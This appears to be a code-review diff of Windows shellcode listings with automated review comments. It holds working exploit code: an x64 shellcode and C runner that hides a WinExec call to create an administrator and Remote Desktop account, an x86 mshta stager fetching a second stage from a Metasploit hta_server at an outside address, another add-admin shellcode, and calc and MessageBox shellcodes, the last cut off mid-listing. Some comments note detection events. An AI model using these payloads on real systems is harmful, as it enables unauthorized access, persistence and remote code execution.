je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
jmp short command
WinExec:
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = <COMMAND STRING> + 0x00 (Null Terminated)
; UINT uCmdShow => RDX = 0x0 = SW_HIDE
; );
xor rdx, rdx ; RDX = 0x0 = SW_HIDE
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec(<COMMNAD>, SW_HIDE)
add rsp, 0x20 ; Fix stack
ret
command:
; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0);
; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u
; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL
; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net
; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi
; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU
; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca
; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D
; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO
; 4B 55 20 2F 61 64 64 00 KU /add.
; String length : 135
mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b
shr rax, 0x8
push rax
mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573
push rax
mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365
push rax
mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552
push rax
mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c
push rax
mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e
push rax
mov rax, 0x202626206464612f ; && dda/ : 202626206464612f
push rax
mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372
push rax
mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e
push rax
mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f
push rax
mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20
push rax
mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064
push rax
mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d
push rax
mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320
push rax
mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573
push rax
mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f
push rax
mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63
push rax
mov rcx, rsp ; RCX = <COMMAND STRING>,0x0
call WinExec
###########################################################################################################################################
#include <windows.h>
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
int main(void) {
void* exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49"
"\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44"
"\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59"
"\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff"
"\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91"
"\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20"
"\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22"
"\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67"
"\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48"
"\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d"
"\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33"
"\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f"
"\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff";
unsigned int payload_len = 387;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
// If all good, run the payload
if (rv != 0) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
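
Review bot: the `; RDI = RVA AddressTable` comment on `mov r10d, [rdx+0x1C]` is wrong here too (the destination is R10), and `; Call WinExec(<COMMNAD>, SW_HIDE)` has a typo. This runner is the better of the two in the commit because it checks `rv`, but `VirtualAlloc` can still return NULL and `RtlMoveMemory(exec_mem, payload, payload_len);` runs before any check; test `exec_mem` as well, and pass `INFINITE` instead of `-1` to `WaitForSingleObject`. The command string laid out in the `command:` block is also what makes this payload loud on a monitored host: `net user ... /add` and the two `net localgroup ... /add` calls generate Security log events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group), with `cmd.exe` and `net.exe` spawned as children of the injected process, so those are the signals to alert on.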

@ -0,0 +1,185 @@
# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 11-01-2021
# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
## Metasploit compatible payload list:
# generic/custom
# generic/debug_trap
# generic/shell_bind_tcp
# generic/shell_reverse_tcp
# generic/tight_loop
# windows/dllinject/bind_hidden_ipknock_tcp
# windows/dllinject/bind_hidden_tcp
# windows/dllinject/bind_ipv6_tcp
# windows/dllinject/bind_ipv6_tcp_uuid
# windows/dllinject/bind_named_pipe
# windows/dllinject/bind_nonx_tcp
# windows/dllinject/bind_tcp
# windows/dllinject/bind_tcp_rc4
# windows/dllinject/bind_tcp_uuid
# windows/dllinject/reverse_hop_http
# windows/dllinject/reverse_http
# windows/dllinject/reverse_http_proxy_pstore
# windows/dllinject/reverse_ipv6_tcp
# windows/dllinject/reverse_nonx_tcp
# windows/dllinject/reverse_ord_tcp
# windows/dllinject/reverse_tcp
# windows/dllinject/reverse_tcp_allports
# windows/dllinject/reverse_tcp_dns
# windows/dllinject/reverse_tcp_rc4
# windows/dllinject/reverse_tcp_rc4_dns
# windows/dllinject/reverse_tcp_uuid
# windows/dllinject/reverse_winhttp
# windows/dns_txt_query_exec
# windows/download_exec
# windows/exec
# windows/loadlibrary
# windows/messagebox
# windows/meterpreter/bind_hidden_ipknock_tcp
# windows/meterpreter/bind_hidden_tcp
# windows/meterpreter/bind_ipv6_tcp
# windows/meterpreter/bind_ipv6_tcp_uuid
# windows/meterpreter/bind_named_pipe
# windows/meterpreter/bind_nonx_tcp
# windows/meterpreter/bind_tcp
# windows/meterpreter/bind_tcp_rc4
# windows/meterpreter/bind_tcp_uuid
# windows/meterpreter/reverse_hop_http
# windows/meterpreter/reverse_http
# windows/meterpreter/reverse_http_proxy_pstore
# windows/meterpreter/reverse_https
# windows/meterpreter/reverse_https_proxy
# windows/meterpreter/reverse_ipv6_tcp
# windows/meterpreter/reverse_named_pipe
# windows/meterpreter/reverse_nonx_tcp
# windows/meterpreter/reverse_ord_tcp
# windows/meterpreter/reverse_tcp
# windows/meterpreter/reverse_tcp_allports
# windows/meterpreter/reverse_tcp_dns
# windows/meterpreter/reverse_tcp_rc4
# windows/meterpreter/reverse_tcp_rc4_dns
# windows/meterpreter/reverse_tcp_uuid
# windows/meterpreter/reverse_winhttp
# windows/meterpreter/reverse_winhttps
# windows/metsvc_bind_tcp
# windows/metsvc_reverse_tcp
# windows/patchupdllinject/bind_hidden_ipknock_tcp
# windows/patchupdllinject/bind_hidden_tcp
# windows/patchupdllinject/bind_ipv6_tcp
# windows/patchupdllinject/bind_ipv6_tcp_uuid
# windows/patchupdllinject/bind_named_pipe
# windows/patchupdllinject/bind_nonx_tcp
# windows/patchupdllinject/bind_tcp
# windows/patchupdllinject/bind_tcp_rc4
# windows/patchupdllinject/bind_tcp_uuid
# windows/patchupdllinject/reverse_ipv6_tcp
# windows/patchupdllinject/reverse_nonx_tcp
# windows/patchupdllinject/reverse_ord_tcp
# windows/patchupdllinject/reverse_tcp
# windows/patchupdllinject/reverse_tcp_allports
# windows/patchupdllinject/reverse_tcp_dns
# windows/patchupdllinject/reverse_tcp_rc4
# windows/patchupdllinject/reverse_tcp_rc4_dns
# windows/patchupdllinject/reverse_tcp_uuid
# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
# windows/patchupmeterpreter/bind_hidden_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
# windows/patchupmeterpreter/bind_named_pipe
# windows/patchupmeterpreter/bind_nonx_tcp
# windows/patchupmeterpreter/bind_tcp
# windows/patchupmeterpreter/bind_tcp_rc4
# windows/patchupmeterpreter/bind_tcp_uuid
# windows/patchupmeterpreter/reverse_ipv6_tcp
# windows/patchupmeterpreter/reverse_nonx_tcp
# windows/patchupmeterpreter/reverse_ord_tcp
# windows/patchupmeterpreter/reverse_tcp
# windows/patchupmeterpreter/reverse_tcp_allports
# "hta_server" exploit payloads setting example:
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x75732082
# Function address of ExitProcess in kernel32.dll: 0x7578214f
# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
# Assembly Shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov [edi+65], al ; size in bytes of message db parameter
StartUpInfoANDProcessInformation:
push eax ; hStderror null in this case
push eax ; hStdOutput, null
push eax ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12 ; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44 ; cb=0x44
lea eax, [esp+0x10] ; eax points to StartUpInfo
; eax has a pointer to StartUPinfo
; esp has a pointer to Process_Info containing null values
createprocessA:
push esp ; pointer to Process-Info
push eax ; pointer to StartUpInfo
xor ebx, ebx
push ebx ; null
push ebx ; null
push ebx ; null
inc ebx
push ebx ; bInheritHandles=true
dec ebx
push ebx ; null
push ebx ; null
push edi ; pointer to message db string
push ebx ; null
mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax ; createprocessA return in eax
mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"
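Review bot: the null terminator written by `mov [edi+65], al` lands one byte past the end of the 143-byte shellcode, outside any buffer that was sized to `payload_len`; a runner that allocates exactly the payload length only survives because `VirtualAlloc` rounds up to a page, so the header should state that the buffer must be at least one byte larger and writable at that position. The header also lists three tested systems (Windows 7, Vista, Server 2003) but gives a single hardcoded pair of addresses (`CreateProcessA` 0x75732082, `ExitProcess` 0x7578214f); one pair cannot be valid for all three kernel32 builds, so state which build the addresses belong to and that they must be re-resolved for any other target. Documentation points: "Date: 11-01-2021" is ambiguous next to the repository date (spell out the month), "technic" should read "technique", the dead `;mov word [esp+0x3c], 0x0101` line should be removed or its replacement by the `mov bx`/`sub bx` pair explained, and the comment "18 times loop to fill both structures" is only correct together with the three preceding `push eax` lines (17 dwords for a 0x44-byte STARTUPINFO plus 4 dwords for PROCESS_INFORMATION is 21 pushes).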


@ -0,0 +1,84 @@
# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 20-02-2021
#
# Tested on:
# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
#
# Description:
# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
#
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x77082082
# Function address of ExitProcess in kernel32.dll: 0x770d214f
# Administartor user credentials: alfred:test
# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
#
# Assembly shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al ; size of message db parameter
StartUpInfoANDProcessInformation:
push eax; hStderror null in this case
push eax; hStdOutput, null
push eax; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]; eax points to StartUpInfo
; eax holds a pointer to StartUPinfo
; esp holds a pointer to Process_Info filled of null values
createprocessA:
push esp; pointer to Process-Info
push eax; pointer to StartUpInfo
xor ebx, ebx
push ebx; null
push ebx; null
push ebx; null
inc ebx
push ebx; bInheritHandles=3Dtrue
dec ebx
push ebx; null
push ebx; null
push edi; pointer to message db string
push ebx; null
mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax; createprocessA return in eax
mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'
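Review bot: the `net user ... /add` and `net localgroup ... /add` commands in the message string succeed only when the hosting process already holds administrative rights; the shellcode performs no elevation, so the description should state that precondition rather than implying it grants administrator access by itself. The file also carries quoted-printable residue in three comments ("0x98 hex =3D", "cb=3D0x44", "bInheritHandles=3Dtrue"), where "=3D" should be "="; it was evidently passed through a mail encoder before submission. As in the sibling mshta listing, the terminator written at `[edi+0x98]` is one byte past the 240-byte payload and needs a note about buffer sizing, and the single address pair (0x77082082 / 0x770d214f) should name the kernel32 build it was taken from since it cannot hold for all three listed systems. Minor: "Administartor" should read "Administrator", "hStderror" should read "hStdError", and the plaintext credential `alfred:test` should be called out as a placeholder in the header.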


@ -0,0 +1,187 @@
; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
; Description:
; This is a shellcode that pop a calc.exe. The shellcode iuses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec
; and exits gracefully using TerminateProcess.
; Author: h4pp1n3ss
; Date: Wed 09/22/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
start:
mov ebp, esp ; prologue
add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
jne next_module ; No: try next module
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; POP the return address from the stack
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc:
call find_function_ret ; Relative CALL with negative offset
find_function:
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset to PE Signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA for later
find_function_loop:
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our names counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Check for NULL terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished:
popad ; Restore registers
ret ;
resolve_symbols_kernel32:
push 0xe8afe98 ; WinExec hash
call dword ptr [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save WinExec address for later usage
push 0x78b5b983 ; TerminateProcess hash
call dword ptr [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
create_calc_string:
xor eax, eax ; EAX = null
push eax ; Push null-terminated string
push dword 0x6578652e ;
push dword 0x636c6163 ;
push esp ; ESP = &(lpCmdLine)
pop ebx ; EBX save pointer to string
; UINT WinExec(
; LPCSTR lpCmdLine, -> EBX
; UINT uCmdShow -> EAX
; );
call_winexec:
xor eax, eax ; EAX = null
push eax ; uCmdShow
push ebx ; lpCmdLine
call dword ptr [ebp+0x10] ; Call WinExec
; BOOL TerminateProcess(
; HANDLE hProcess, -> 0xffffffff
; UINT uExitCode -> EAX
; );
terminate_process:
xor eax, eax ; EAX = null
push eax ; uExitCode
push 0xffffffff ; hProcess
call dword ptr [ebp+0x14] ; Call TerminateProcess
[!]===================================== POC ========================================= [!]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Our WinExec PopCalc shellcode
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e"
"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43"
"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b"
"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61"
"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0"
"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff"
"\xff\x55\x14";
unsigned int payload_len = 178;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nHit me!\n");
printf("Shellcode Length: %d\n", strlen(payload));
getchar();
// If all good, run the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
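Review bot: the listing mixes the assembly source and a C runner in one file separated only by a `[!]== POC ==[!]` banner, so neither an assembler nor a C compiler accepts it as submitted; split it into two files or clearly mark where each begins. Related, `call dword ptr [ebp+0x04]` is MASM/Keystone syntax, while the sibling MessageBoxA listing writes the same call as `call dword [ebp+0x04]` (NASM has no `ptr` keyword); state which assembler the source targets. In the logic, the resolved addresses are stored at `[ebp+0x04]`, `[ebp+0x10]` and `[ebp+0x14]` with `ebp` equal to the entry `esp`, so those writes land above the entry stack pointer in the caller's frame rather than in the 0x610 bytes reserved by `add esp, 0xfffff9f0`; this is only safe because the runner starts the payload in a fresh thread whose frame is disposable, and the comment should say so. `push 0xe8afe98` is the 32-bit value 0x0e8afe98 (bytes `98 fe 8a 0e` in the payload); write it at full width so it can be checked against the byte string. In the runner, `printf("%d", strlen(payload))` mismatches `size_t` (use `%zu`), `WaitForSingleObject(th, -1)` should pass `INFINITE`, the `VirtualAlloc` and `CreateThread` results go unchecked, and `<stdlib.h>` is unused. Description typos: "pop a calc.exe" and "iuses" (uses), and "Add space int ESP" (in).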


@ -0,0 +1,196 @@
; Name: Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
; Author: h4pp1n3ss
; Date: Wed 09/23/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
; Description:
; This is a shellcode that
; pop a MessageBox and show the text "Pwn3d by h4pp1n3ss". In order to accomplish this task the shellcode uses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
; symbols without worry about the length.
start:
mov ebp, esp ;
add esp, 0xfffff9f0 ; Avoid NULL bytes
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
jne next_module ; No: try next module
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; POP the return address from the stack
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc:
call find_function_ret ; Relative CALL with negative offset
find_function:
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset to PE Signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA for later
find_function_loop:
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our names counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Check for NULL terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished:
popad ; Restore registers
ret ;
resolve_symbols_kernel32:
push 0xec0e4e8e ; LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save LoadLibraryA address for later usage
push 0x78b5b983 ; TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
load_user32_lib:
xor eax, eax ; EAX = Null
mov ax, 0x6c6c;
push eax; ; Stack = "ll"
push dword 0x642e3233; ; Stack = "32.dll"
push dword 0x72657355; ; Stack = "User32.dll"
push esp ; Stack = &("User32.dll")
call dword [ebp+0x10] ; Call LoadLibraryA
resolve_symbols_user32:
mov ebx, eax ; Move the base address of user32.dll to EBX
push 0xbc4da2a8 ; MessageBoxA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x18], eax ; Save MessageBoxA address for later usage
call_MessageBoxA:
xor eax, eax ; EAX = NULL
mov ax, 0x7373 ; "ss"
push eax ; Stack = "ss"
push dword 0x336e3170 ; Stack = "p1n3ss"
push dword 0x70346820 ; Stack = " h4pp1n3ss"
push dword 0x79622064 ; Stack = "d by h4pp1n3ss"
push dword 0x336e7750 ; Stack = "Pwn3d by h4pp1n3ss"
